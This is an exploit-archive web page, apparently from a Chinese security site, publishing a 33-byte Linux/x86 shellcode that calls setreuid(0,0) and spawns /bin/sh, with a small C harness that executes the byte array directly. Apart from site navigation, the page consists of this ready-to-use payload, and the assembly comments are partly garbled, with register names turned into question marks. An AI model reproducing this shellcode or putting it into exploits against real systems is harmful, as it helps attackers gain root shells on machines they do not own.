首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes


http://www.gipsky.com/
/*
* (Linux/x86) setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL])
* - 33 bytes
* - xgc@gotfault.net
*
*/

char shellcode[] =

"\x6a\x46" // push $0x46
"\x58" // pop ?x
"\x31\xdb" // xor ?x, ?x
"\x31\xc9" // xor ?x, ?x
"\xcd\x80" // int $0x80

"\x31\xd2" // xor ?x, ?x
"\x6a\x0b" // push $0xb
"\x58" // pop ?x
"\x52" // push ?x
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, ?x
"\x52" // push ?x
"\x53" // push ?x
"\x89\xe1" // mov %esp, ?x
"\xcd\x80"; // int $0x80

int main() {

int (*f)() = (int(*)())shellcode;
printf("Length: %u\n", strlen(shellcode));
f();
}

[2006-04-03]
<< linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes AngelineCMS 0.8.1 (installpath) Remote File Inclusion Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号